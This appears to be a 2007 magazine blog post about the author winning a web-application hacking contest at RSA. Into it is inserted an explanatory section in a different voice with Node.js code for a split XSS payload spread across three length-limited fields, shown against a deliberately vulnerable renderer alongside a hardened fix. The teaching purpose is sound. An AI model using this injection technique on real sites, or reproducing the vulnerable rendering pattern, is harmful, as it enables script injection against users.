For Hackers, By a Hacker


February 13, 2007


It can sometimes be challenging to convince folks that Network Computing is serious about the motto, "For IT, By IT" (see banner, two inches to the right). It's not just a nice-sounding phrase, but a major cornerstone of the philosophy of the magazine.

When I started covering the security beat, the most important challenge was learning the ins and outs of the magazine and working on my writing and other skills, not so much learning the technology. Security isn't just something I write about; it's what I do on a day-to-day basis. When talking to companies about their security products, they don't always get down to the technical details, but focus on high-level discussions about why their product is different or important. Hopefully they catch on when I explain that I really do want to hear about the details of the technology itself, but sometimes it's better to show than tell, right?

To that end, I participated in the Interactive Testing Challenge at RSA last week (OK, I admit, it wasn't just for that reason; I did it for fun, too). Carefully not called a hacking contest (by the organizers, anyway), it was a three-day event meant to exercise web application exploitation skills.

First of all, hats off to Security Innovation for a great contest. It can be really hard to find the right difficulty level for a live-fire scenario like that, and the sample online bank built for the event was perfect.

The most important factor in the contest besides basic web exploitation skills (cross-site scripting (XSS), SQL injection, cross-site request forgery (CSRF), etc.) was speed. The top two contestants from each of the first two days competed at the end of the day in a best-of-three challenge for a spot in the finals on the third. The first day ended with me and a technical staff member from the Church of Jesus Christ of Latter-Day Saints, not exactly who you'd expect to end up competing at the end of the first day of the biggest security conference on the planet.

The semi-finals each day were nerve-wracking. Announcers with microphones described the attacks and potential defenses as the audience stood around watching the two contestants on overhead displays, helping to increase the tension. Having both participated and watched, it certainly was much easier to spot the right answer when you weren't under the gun.

I squeaked out a win in the tie-breaking challenge the first day with only a few seconds to spare, as my opponent was right behind in the hunt to combine three injectable fields into one long JavaScript function. (Each field was limited in length, and the overall JavaScript alert needed to win required all three to be joined, with some clever escaping to re-assemble correctly after the injection.)
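To make the tie-breaker concrete, here is an added example (not code from the post, the contest, or Security Innovation's bank application) that reproduces the shape of that challenge in Node.js: three form fields, each truncated to a per-field limit, are reflected unescaped into one inline script, and the attacker joins them with JavaScript comment delimiters so that only the combined statement survives parsing. The field names, the 20-character limit, the page template and the `runInlineScript` harness are all assumptions; the post does not describe the real application or the exact escaping used. The hardened renderer beside it shows the fix a practitioner would expect.

```javascript
// Added example, not the contest's code. Field names, the limit and the
// template are assumptions; the post gives none of these details.
'use strict';

const MAX_LEN = 20; // assumed per-field length limit

// Vulnerable renderer: each field is dropped straight into a JS string
// literal inside one <script> block, after server-side truncation.
function renderPage(fields) {
  const [first, last, email] = fields.map((f) => String(f).slice(0, MAX_LEN));
  return [
    '<html><body><script>',
    `var first = '${first}';`,
    `var last  = '${last}';`,
    `var email = '${email}';`,
    '</script></body></html>',
  ].join('\n');
}

// Hardened renderer: encode for the JS string context (quotes, backslashes,
// newlines) and neutralise "</" so a value cannot close the <script> element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/<\//g, '<\\/');
}
function renderPageSafe(fields) {
  const [first, last, email] = fields.map((f) => String(f).slice(0, MAX_LEN));
  return [
    '<html><body><script>',
    `var first = ${jsStringLiteral(first)};`,
    `var last  = ${jsStringLiteral(last)};`,
    `var email = ${jsStringLiteral(email)};`,
    '</script></body></html>',
  ].join('\n');
}

// The whole payload (30 chars) does not survive a 20-char field ...
const SINGLE_FIELD_PAYLOAD = `';alert("XSS via 3 fields");//`;

// ... so split it. Each piece closes the literal it lands in, contributes a
// fragment of the statement, and opens a block comment that swallows the
// template code up to the next piece; the last piece line-comments the tail.
// After the comments are stripped, the parser sees:
//   var first = '';alert("XSS "+"via 3 "+"fields");
const SPLIT_PAYLOAD = [
  `';alert("XSS "+/*`,
  `*/"via 3 "+/*`,
  `*/"fields");//`,
];

function piecesFitLimit(pieces) {
  return pieces.every((p) => p.length <= MAX_LEN);
}

// Node has no DOM, so pull the inline script out of the HTML and run it with
// a stand-in alert() that records what it was called with.
function runInlineScript(html) {
  const body = /<script>([\s\S]*?)<\/script>/.exec(html)[1];
  const alerts = [];
  const vars = new Function(
    'alert',
    'var first, last, email;\n' + body +
      '\nreturn { first: first, last: last, email: email };'
  )((msg) => alerts.push(String(msg)));
  return { alerts, vars };
}

// Stand-alone demo: the alert fires on the vulnerable page only.
console.log(runInlineScript(renderPage(SPLIT_PAYLOAD)).alerts);     // [ 'XSS via 3 fields' ]
console.log(runInlineScript(renderPageSafe(SPLIT_PAYLOAD)).alerts); // []
```

The length limit is what forces the split: truncating `SINGLE_FIELD_PAYLOAD` to 20 characters leaves an unterminated string and a syntax error, whereas the three pieces each fit and reassemble into one valid call. In the hardened page the same pieces arrive intact as data (`first` holds the literal text of the first piece) because `JSON.stringify` escapes the quote that every piece relies on to break out of its literal.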

In the finals (thanks, Jeremiah, for the pics and the kind words!) my competition was a skilled security officer from a large medical device company headquartered in Switzerland. While I was lucky enough to win in only two rounds, it could have easily gone to three. I was quite glad it didn't, as it turned out the final challenge would have been quite a doozy: a multi-part problem involving reverse engineering a pseudo-encryption JavaScript function to crack a password.

Walking away with the win (and a cool GPS and entrance to RSA next year) was a lot of fun. I get to hold my head high, post a blog entry for hackers by a hacker, and I suppose if writing doesn't work out, I might just have a future hacking (excuse me, securing) web applications.
